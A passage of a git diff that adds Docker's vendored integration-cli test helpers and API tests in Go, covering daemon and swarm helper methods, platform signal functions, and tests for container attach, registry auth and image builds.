*Daemon) sock() string { + return fmt.Sprintf("unix://" + d.sockPath()) +} + +func (d *Daemon) sockPath() string { + return filepath.Join(daemonSockRoot, d.id+".sock") +} + +func (d *Daemon) waitRun(contID string) error { + args := []string{"--host", d.sock()} + return waitInspectWithArgs(contID, "{{.State.Running}}", "true", 10*time.Second, args...) +} + +func (d *Daemon) getBaseDeviceSize(c *check.C) int64 { + infoCmdOutput, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "-H", d.sock(), "info"), + exec.Command("grep", "Base Device Size"), + ) + c.Assert(err, checker.IsNil) + basesizeSlice := strings.Split(infoCmdOutput, ":") + basesize := strings.Trim(basesizeSlice[1], " ") + basesize = strings.Trim(basesize, "\n")[:len(basesize)-3] + basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) + c.Assert(err, checker.IsNil) + basesizeBytes := int64(basesizeFloat) * (1024 * 1024 * 1024) + return basesizeBytes +} + +// Cmd will execute a docker CLI command against this Daemon. +// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version +func (d *Daemon) Cmd(args ...string) (string, error) { + b, err := d.command(args...).CombinedOutput() + return string(b), err +} + +func (d *Daemon) command(args ...string) *exec.Cmd { + return exec.Command(dockerBinary, d.prependHostArg(args)...) +} + +func (d *Daemon) prependHostArg(args []string) []string { + for _, arg := range args { + if arg == "--host" || arg == "-H" { + return args + } + } + return append([]string{"--host", d.sock()}, args...) +} + +// SockRequest executes a socket request on a daemon and returns statuscode and output. 
+func (d *Daemon) SockRequest(method, endpoint string, data interface{}) (int, []byte, error) { + jsonData := bytes.NewBuffer(nil) + if err := json.NewEncoder(jsonData).Encode(data); err != nil { + return -1, nil, err + } + + res, body, err := d.SockRequestRaw(method, endpoint, jsonData, "application/json") + if err != nil { + return -1, nil, err + } + b, err := readBody(body) + return res.StatusCode, b, err +} + +// SockRequestRaw executes a socket request on a daemon and returns an http +// response and a reader for the output data. +func (d *Daemon) SockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) { + return sockRequestRawToDaemon(method, endpoint, data, ct, d.sock()) +} + +// LogFileName returns the path the the daemon's log file +func (d *Daemon) LogFileName() string { + return d.logFile.Name() +} + +func (d *Daemon) getIDByName(name string) (string, error) { + return d.inspectFieldWithError(name, "Id") +} + +func (d *Daemon) activeContainers() (ids []string) { + out, _ := d.Cmd("ps", "-q") + for _, id := range strings.Split(out, "\n") { + if id = strings.TrimSpace(id); id != "" { + ids = append(ids, id) + } + } + return +} + +func (d *Daemon) inspectFilter(name, filter string) (string, error) { + format := fmt.Sprintf("{{%s}}", filter) + out, err := d.Cmd("inspect", "-f", format, name) + if err != nil { + return "", fmt.Errorf("failed to inspect %s: %s", name, out) + } + return strings.TrimSpace(out), nil +} + +func (d *Daemon) inspectFieldWithError(name, field string) (string, error) { + return d.inspectFilter(name, fmt.Sprintf(".%s", field)) +} + +func (d *Daemon) findContainerIP(id string) string { + out, err := d.Cmd("inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.bridge.IPAddress }}'"), id) + if err != nil { + d.c.Log(err) + } + return strings.Trim(out, " \r\n'") +} + +func (d *Daemon) buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, int, 
error) { + buildCmd := buildImageCmdWithHost(name, dockerfile, d.sock(), useCache, buildFlags...) + return runCommandWithOutput(buildCmd) +} + +func (d *Daemon) checkActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + if len(strings.TrimSpace(out)) == 0 { + return 0, nil + } + return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out)) +} + +func (d *Daemon) reloadConfig() error { + if d.cmd == nil || d.cmd.Process == nil { + return fmt.Errorf("daemon is not running") + } + + errCh := make(chan error) + started := make(chan struct{}) + go func() { + _, body, err := sockRequestRawToDaemon("GET", "/events", nil, "", d.sock()) + close(started) + if err != nil { + errCh <- err + } + defer body.Close() + dec := json.NewDecoder(body) + for { + var e events.Message + if err := dec.Decode(&e); err != nil { + errCh <- err + return + } + if e.Type != events.DaemonEventType { + continue + } + if e.Action != "reload" { + continue + } + close(errCh) // notify that we are done + return + } + }() + + <-started + if err := signalDaemonReload(d.cmd.Process.Pid); err != nil { + return fmt.Errorf("error signaling daemon reload: %v", err) + } + select { + case err := <-errCh: + if err != nil { + return fmt.Errorf("error waiting for daemon reload event: %v", err) + } + case <-time.After(30 * time.Second): + return fmt.Errorf("timeout waiting for daemon reload event") + } + return nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go new file mode 100644 index 0000000000..199bce0e7b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go @@ -0,0 +1,419 @@ +package main + +import ( + "encoding/json" + "fmt" + "net/http" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + 
"github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// SwarmDaemon is a test daemon with helpers for participating in a swarm. +type SwarmDaemon struct { + *Daemon + swarm.Info + port int + listenAddr string +} + +// Init initializes a new swarm cluster. +func (d *SwarmDaemon) Init(req swarm.InitRequest) error { + if req.ListenAddr == "" { + req.ListenAddr = d.listenAddr + } + status, out, err := d.SockRequest("POST", "/swarm/init", req) + if status != http.StatusOK { + return fmt.Errorf("initializing swarm: invalid statuscode %v, %q", status, out) + } + if err != nil { + return fmt.Errorf("initializing swarm: %v", err) + } + info, err := d.info() + if err != nil { + return err + } + d.Info = info + return nil +} + +// Join joins a daemon to an existing cluster. +func (d *SwarmDaemon) Join(req swarm.JoinRequest) error { + if req.ListenAddr == "" { + req.ListenAddr = d.listenAddr + } + status, out, err := d.SockRequest("POST", "/swarm/join", req) + if status != http.StatusOK { + return fmt.Errorf("joining swarm: invalid statuscode %v, %q", status, out) + } + if err != nil { + return fmt.Errorf("joining swarm: %v", err) + } + info, err := d.info() + if err != nil { + return err + } + d.Info = info + return nil +} + +// Leave forces daemon to leave current cluster. 
+func (d *SwarmDaemon) Leave(force bool) error { + url := "/swarm/leave" + if force { + url += "?force=1" + } + status, out, err := d.SockRequest("POST", url, nil) + if status != http.StatusOK { + return fmt.Errorf("leaving swarm: invalid statuscode %v, %q", status, out) + } + if err != nil { + err = fmt.Errorf("leaving swarm: %v", err) + } + return err +} + +func (d *SwarmDaemon) info() (swarm.Info, error) { + var info struct { + Swarm swarm.Info + } + status, dt, err := d.SockRequest("GET", "/info", nil) + if status != http.StatusOK { + return info.Swarm, fmt.Errorf("get swarm info: invalid statuscode %v", status) + } + if err != nil { + return info.Swarm, fmt.Errorf("get swarm info: %v", err) + } + if err := json.Unmarshal(dt, &info); err != nil { + return info.Swarm, err + } + return info.Swarm, nil +} + +type serviceConstructor func(*swarm.Service) +type nodeConstructor func(*swarm.Node) +type specConstructor func(*swarm.Spec) + +func (d *SwarmDaemon) createService(c *check.C, f ...serviceConstructor) string { + var service swarm.Service + for _, fn := range f { + fn(&service) + } + status, out, err := d.SockRequest("POST", "/services/create", service.Spec) + + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out))) + + var scr types.ServiceCreateResponse + c.Assert(json.Unmarshal(out, &scr), checker.IsNil) + return scr.ID +} + +func (d *SwarmDaemon) getService(c *check.C, id string) *swarm.Service { + var service swarm.Service + status, out, err := d.SockRequest("GET", "/services/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &service), checker.IsNil) + return &service +} + +func (d *SwarmDaemon) getServiceTasks(c *check.C, service string) []swarm.Task { + var tasks []swarm.Task + + filterArgs := filters.NewArgs() + 
filterArgs.Add("desired-state", "running") + filterArgs.Add("service", service) + filters, err := filters.ToParam(filterArgs) + c.Assert(err, checker.IsNil) + + status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &tasks), checker.IsNil) + return tasks +} + +func (d *SwarmDaemon) checkServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.getServiceTasks(c, service) + var count int + for _, task := range tasks { + if task.Status.State == state { + if message == "" || strings.Contains(task.Status.Message, message) { + count++ + } + } + } + return count, nil + } +} + +func (d *SwarmDaemon) checkServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { + return d.checkServiceTasksInState(service, swarm.TaskStateRunning, "") +} + +func (d *SwarmDaemon) checkServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + service := d.getService(c, service) + return service.UpdateStatus.State, nil + } +} + +func (d *SwarmDaemon) checkServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.getServiceTasks(c, service) + return len(tasks), nil + } +} + +func (d *SwarmDaemon) checkRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) { + var tasks []swarm.Task + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + filters, err := filters.ToParam(filterArgs) + c.Assert(err, checker.IsNil) + + status, out, err := d.SockRequest("GET", 
"/tasks?filters="+filters, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &tasks), checker.IsNil) + + result := make(map[string]int) + for _, task := range tasks { + if task.Status.State == swarm.TaskStateRunning { + result[task.Spec.ContainerSpec.Image]++ + } + } + return result, nil +} + +func (d *SwarmDaemon) checkNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) { + nodes := d.listNodes(c) + var readyCount int + for _, node := range nodes { + if node.Status.State == swarm.NodeStateReady { + readyCount++ + } + } + return readyCount, nil +} + +func (d *SwarmDaemon) getTask(c *check.C, id string) swarm.Task { + var task swarm.Task + + status, out, err := d.SockRequest("GET", "/tasks/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &task), checker.IsNil) + return task +} + +func (d *SwarmDaemon) updateService(c *check.C, service *swarm.Service, f ...serviceConstructor) { + for _, fn := range f { + fn(service) + } + url := fmt.Sprintf("/services/%s/update?version=%d", service.ID, service.Version.Index) + status, out, err := d.SockRequest("POST", url, service.Spec) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) removeService(c *check.C, id string) { + status, out, err := d.SockRequest("DELETE", "/services/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) getNode(c *check.C, id string) *swarm.Node { + var node swarm.Node + status, out, err := d.SockRequest("GET", "/nodes/"+id, nil) + c.Assert(err, 
checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &node), checker.IsNil) + c.Assert(node.ID, checker.Equals, id) + return &node +} + +func (d *SwarmDaemon) removeNode(c *check.C, id string, force bool) { + url := "/nodes/" + id + if force { + url += "?force=1" + } + + status, out, err := d.SockRequest("DELETE", url, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) updateNode(c *check.C, id string, f ...nodeConstructor) { + for i := 0; ; i++ { + node := d.getNode(c, id) + for _, fn := range f { + fn(node) + } + url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index) + status, out, err := d.SockRequest("POST", url, node.Spec) + if i < 10 && strings.Contains(string(out), "update out of sequence") { + time.Sleep(100 * time.Millisecond) + continue + } + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + return + } +} + +func (d *SwarmDaemon) listNodes(c *check.C) []swarm.Node { + status, out, err := d.SockRequest("GET", "/nodes", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + + nodes := []swarm.Node{} + c.Assert(json.Unmarshal(out, &nodes), checker.IsNil) + return nodes +} + +func (d *SwarmDaemon) listServices(c *check.C) []swarm.Service { + status, out, err := d.SockRequest("GET", "/services", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + + services := []swarm.Service{} + c.Assert(json.Unmarshal(out, &services), checker.IsNil) + return services +} + +func (d *SwarmDaemon) 
createSecret(c *check.C, secretSpec swarm.SecretSpec) string { + status, out, err := d.SockRequest("POST", "/secrets/create", secretSpec) + + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out))) + + var scr types.SecretCreateResponse + c.Assert(json.Unmarshal(out, &scr), checker.IsNil) + return scr.ID +} + +func (d *SwarmDaemon) listSecrets(c *check.C) []swarm.Secret { + status, out, err := d.SockRequest("GET", "/secrets", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + + secrets := []swarm.Secret{} + c.Assert(json.Unmarshal(out, &secrets), checker.IsNil) + return secrets +} + +func (d *SwarmDaemon) getSecret(c *check.C, id string) *swarm.Secret { + var secret swarm.Secret + status, out, err := d.SockRequest("GET", "/secrets/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &secret), checker.IsNil) + return &secret +} + +func (d *SwarmDaemon) deleteSecret(c *check.C, id string) { + status, out, err := d.SockRequest("DELETE", "/secrets/"+id, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) getSwarm(c *check.C) swarm.Swarm { + var sw swarm.Swarm + status, out, err := d.SockRequest("GET", "/swarm", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &sw), checker.IsNil) + return sw +} + +func (d *SwarmDaemon) updateSwarm(c *check.C, f ...specConstructor) { + sw := d.getSwarm(c) + for _, fn := range f { + fn(&sw.Spec) + } + url := 
fmt.Sprintf("/swarm/update?version=%d", sw.Version.Index) + status, out, err := d.SockRequest("POST", url, sw.Spec) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) rotateTokens(c *check.C) { + var sw swarm.Swarm + status, out, err := d.SockRequest("GET", "/swarm", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &sw), checker.IsNil) + + url := fmt.Sprintf("/swarm/update?version=%d&rotateWorkerToken=true&rotateManagerToken=true", sw.Version.Index) + status, out, err = d.SockRequest("POST", url, sw.Spec) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) +} + +func (d *SwarmDaemon) joinTokens(c *check.C) swarm.JoinTokens { + var sw swarm.Swarm + status, out, err := d.SockRequest("GET", "/swarm", nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + c.Assert(json.Unmarshal(out, &sw), checker.IsNil) + return sw.JoinTokens +} + +func (d *SwarmDaemon) checkLocalNodeState(c *check.C) (interface{}, check.CommentInterface) { + info, err := d.info() + c.Assert(err, checker.IsNil) + return info.LocalNodeState, nil +} + +func (d *SwarmDaemon) checkControlAvailable(c *check.C) (interface{}, check.CommentInterface) { + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + return info.ControlAvailable, nil +} + +func (d *SwarmDaemon) checkLeader(c *check.C) (interface{}, check.CommentInterface) { + errList := check.Commentf("could not get node list") + status, out, err := d.SockRequest("GET", "/nodes", nil) + if err != nil { + 
return err, errList + } + if status != http.StatusOK { + return fmt.Errorf("expected http status OK, got: %d", status), errList + } + + var ls []swarm.Node + if err := json.Unmarshal(out, &ls); err != nil { + return err, errList + } + + for _, node := range ls { + if node.ManagerStatus != nil && node.ManagerStatus.Leader { + return nil, nil + } + } + return fmt.Errorf("no leader"), check.Commentf("could not find leader") +} + +func (d *SwarmDaemon) cmdRetryOutOfSequence(args ...string) (string, error) { + for i := 0; ; i++ { + out, err := d.Cmd(args...) + if err != nil { + if strings.Contains(out, "update out of sequence") { + if i < 10 { + continue + } + } + } + return out, err + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go new file mode 100644 index 0000000000..0cea901420 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go @@ -0,0 +1,20 @@ +package main + +import "github.com/go-check/check" + +func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *SwarmDaemon { + s.daemonsLock.Lock() + defer s.daemonsLock.Unlock() + for _, d := range s.daemons { + if d.NodeID == nodeID { + return d + } + } + c.Fatalf("could not find node with id: %s", nodeID) + return nil +} + +// nodeCmd executes a command on a given node via the normal docker socket +func (s *DockerSwarmSuite) nodeCmd(c *check.C, id string, args ...string) (string, error) { + return s.getDaemon(c, id).Cmd(args...) 
+} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go new file mode 100644 index 0000000000..6ca7daf21c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go @@ -0,0 +1,35 @@ +// +build !windows + +package main + +import ( + "os" + "path/filepath" + "syscall" + + "github.com/go-check/check" +) + +func cleanupExecRoot(c *check.C, execRoot string) { + // Cleanup network namespaces in the exec root of this + // daemon because this exec root is specific to this + // daemon instance and has no chance of getting + // cleaned up when a new daemon is instantiated with a + // new exec root. + netnsPath := filepath.Join(execRoot, "netns") + filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error { + if err := syscall.Unmount(path, syscall.MNT_FORCE); err != nil { + c.Logf("unmount of %s failed: %v", path, err) + } + os.Remove(path) + return nil + }) +} + +func signalDaemonDump(pid int) { + syscall.Kill(pid, syscall.SIGQUIT) +} + +func signalDaemonReload(pid int) error { + return syscall.Kill(pid, syscall.SIGHUP) +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go new file mode 100644 index 0000000000..885b703b33 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go @@ -0,0 +1,53 @@ +package main + +import ( + "fmt" + "strconv" + "syscall" + "unsafe" + + "github.com/go-check/check" + "golang.org/x/sys/windows" +) + +func openEvent(desiredAccess uint32, inheritHandle bool, name string, proc *windows.LazyProc) (handle syscall.Handle, err error) { + namep, _ := syscall.UTF16PtrFromString(name) + var _p2 uint32 + if inheritHandle { + _p2 = 1 + } + r0, _, e1 := proc.Call(uintptr(desiredAccess), uintptr(_p2), uintptr(unsafe.Pointer(namep))) + handle = syscall.Handle(r0) + if handle == syscall.InvalidHandle { + err = 
e1 + } + return +} + +func pulseEvent(handle syscall.Handle, proc *windows.LazyProc) (err error) { + r0, _, _ := proc.Call(uintptr(handle)) + if r0 != 0 { + err = syscall.Errno(r0) + } + return +} + +func signalDaemonDump(pid int) { + modkernel32 := windows.NewLazySystemDLL("kernel32.dll") + procOpenEvent := modkernel32.NewProc("OpenEventW") + procPulseEvent := modkernel32.NewProc("PulseEvent") + + ev := "Global\\docker-daemon-" + strconv.Itoa(pid) + h2, _ := openEvent(0x0002, false, ev, procOpenEvent) + if h2 == 0 { + return + } + pulseEvent(h2, procPulseEvent) +} + +func signalDaemonReload(pid int) error { + return fmt.Errorf("daemon reload not supported") +} + +func cleanupExecRoot(c *check.C, execRoot string) { +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go new file mode 100644 index 0000000000..d43bf3ab0e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go @@ -0,0 +1,210 @@ +package main + +import ( + "bufio" + "bytes" + "context" + "io" + "net" + "net/http" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stdcopy" + "github.com/go-check/check" + "golang.org/x/net/websocket" +) + +func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-dit", "busybox", "cat") + + rwc, err := sockConn(time.Duration(10*time.Second), "") + c.Assert(err, checker.IsNil) + + cleanedContainerID := strings.TrimSpace(out) + config, err := websocket.NewConfig( + "/containers/"+cleanedContainerID+"/attach/ws?stream=1&stdin=1&stdout=1&stderr=1", + "http://localhost", + ) + c.Assert(err, checker.IsNil) + + ws, err := websocket.NewClient(config, rwc) + c.Assert(err, checker.IsNil) + defer ws.Close() + + expected := 
[]byte("hello") + actual := make([]byte, len(expected)) + + outChan := make(chan error) + go func() { + _, err := io.ReadFull(ws, actual) + outChan <- err + close(outChan) + }() + + inChan := make(chan error) + go func() { + _, err := ws.Write(expected) + inChan <- err + close(inChan) + }() + + select { + case err := <-inChan: + c.Assert(err, checker.IsNil) + case <-time.After(5 * time.Second): + c.Fatal("Timeout writing to ws") + } + + select { + case err := <-outChan: + c.Assert(err, checker.IsNil) + case <-time.After(5 * time.Second): + c.Fatal("Timeout reading from ws") + } + + c.Assert(actual, checker.DeepEquals, expected, check.Commentf("Websocket didn't return the expected data")) +} + +// regression gh14320 +func (s *DockerSuite) TestPostContainersAttachContainerNotFound(c *check.C) { + req, client, err := newRequestClient("POST", "/containers/doesnotexist/attach", nil, "", "") + c.Assert(err, checker.IsNil) + + resp, err := client.Do(req) + // connection will shutdown, err should be "persistent connection closed" + c.Assert(err, checker.NotNil) // Server shutdown connection + + body, err := readBody(resp.Body) + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound) + expected := "No such container: doesnotexist\r\n" + c.Assert(string(body), checker.Equals, expected) +} + +func (s *DockerSuite) TestGetContainersWsAttachContainerNotFound(c *check.C) { + status, body, err := sockRequest("GET", "/containers/doesnotexist/attach/ws", nil) + c.Assert(status, checker.Equals, http.StatusNotFound) + c.Assert(err, checker.IsNil) + expected := "No such container: doesnotexist" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) +} + +func (s *DockerSuite) TestPostContainersAttach(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectSuccess := func(conn net.Conn, br *bufio.Reader, stream string, tty bool) { + defer conn.Close() + expected := []byte("success") + _, err := conn.Write(expected) + c.Assert(err, 
checker.IsNil) + + conn.SetReadDeadline(time.Now().Add(time.Second)) + lenHeader := 0 + if !tty { + lenHeader = 8 + } + actual := make([]byte, len(expected)+lenHeader) + _, err = io.ReadFull(br, actual) + c.Assert(err, checker.IsNil) + if !tty { + fdMap := map[string]byte{ + "stdin": 0, + "stdout": 1, + "stderr": 2, + } + c.Assert(actual[0], checker.Equals, fdMap[stream]) + } + c.Assert(actual[lenHeader:], checker.DeepEquals, expected, check.Commentf("Attach didn't return the expected data from %s", stream)) + } + + expectTimeout := func(conn net.Conn, br *bufio.Reader, stream string) { + defer conn.Close() + _, err := conn.Write([]byte{'t'}) + c.Assert(err, checker.IsNil) + + conn.SetReadDeadline(time.Now().Add(time.Second)) + actual := make([]byte, 1) + _, err = io.ReadFull(br, actual) + opErr, ok := err.(*net.OpError) + c.Assert(ok, checker.Equals, true, check.Commentf("Error is expected to be *net.OpError, got %v", err)) + c.Assert(opErr.Timeout(), checker.Equals, true, check.Commentf("Read from %s is expected to timeout", stream)) + } + + // Create a container that only emits stdout. + cid, _ := dockerCmd(c, "run", "-di", "busybox", "cat") + cid = strings.TrimSpace(cid) + // Attach to the container's stdout stream. + conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + // Check if the data from stdout can be received. + expectSuccess(conn, br, "stdout", false) + // Attach to the container's stderr stream. + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + // Since the container only emits stdout, attaching to stderr should return nothing. + expectTimeout(conn, br, "stdout") + + // Test the similar functions of the stderr stream. 
+ cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "cat >&2") + cid = strings.TrimSpace(cid) + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + expectSuccess(conn, br, "stderr", false) + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + expectTimeout(conn, br, "stderr") + + // Test with tty. + cid, _ = dockerCmd(c, "run", "-dit", "busybox", "/bin/sh", "-c", "cat >&2") + cid = strings.TrimSpace(cid) + // Attach to stdout only. + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + expectSuccess(conn, br, "stdout", true) + + // Attach without stdout stream. + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + c.Assert(err, checker.IsNil) + // Nothing should be received because both the stdout and stderr of the container will be + // sent to the client as stdout when tty is enabled. 
+ expectTimeout(conn, br, "stdout") + + // Test the client API + // Make sure we don't see "hello" if Logs is false + client, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + + cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "echo hello; cat") + cid = strings.TrimSpace(cid) + + attachOpts := types.ContainerAttachOptions{ + Stream: true, + Stdin: true, + Stdout: true, + } + + resp, err := client.ContainerAttach(context.Background(), cid, attachOpts) + c.Assert(err, checker.IsNil) + expectSuccess(resp.Conn, resp.Reader, "stdout", false) + + // Make sure we do see "hello" if Logs is true + attachOpts.Logs = true + resp, err = client.ContainerAttach(context.Background(), cid, attachOpts) + c.Assert(err, checker.IsNil) + + defer resp.Conn.Close() + resp.Conn.SetReadDeadline(time.Now().Add(time.Second)) + + _, err = resp.Conn.Write([]byte("success")) + c.Assert(err, checker.IsNil) + + actualStdout := new(bytes.Buffer) + actualStderr := new(bytes.Buffer) + stdcopy.StdCopy(actualStdout, actualStderr, resp.Reader) + c.Assert(actualStdout.Bytes(), checker.DeepEquals, []byte("hello\nsuccess"), check.Commentf("Attach didn't return the expected data from stdout")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go new file mode 100644 index 0000000000..bfcae31bd0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go @@ -0,0 +1,25 @@ +package main + +import ( + "net/http" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// Test case for #22244 +func (s *DockerSuite) TestAuthAPI(c *check.C) { + testRequires(c, Network) + config := types.AuthConfig{ + Username: "no-user", + Password: "no-password", + } + + expected := "Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password" + status, body, err := 
sockRequest("POST", "/auth", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusUnauthorized) + msg := getErrorMessage(c, body) + c.Assert(msg, checker.Contains, expected, check.Commentf("Expected: %v, got: %v", expected, msg)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go new file mode 100644 index 0000000000..9b069a43a6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go @@ -0,0 +1,254 @@ +package main + +import ( + "archive/tar" + "bytes" + "net/http" + "regexp" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestBuildAPIDockerFileRemote(c *check.C) { + testRequires(c, NotUserNamespace) + var testD string + if daemonPlatform == "windows" { + testD = `FROM busybox +COPY * /tmp/ +RUN find / -name ba* +RUN find /tmp/` + } else { + // -xdev is required because sysfs can cause EPERM + testD = `FROM busybox +COPY * /tmp/ +RUN find / -xdev 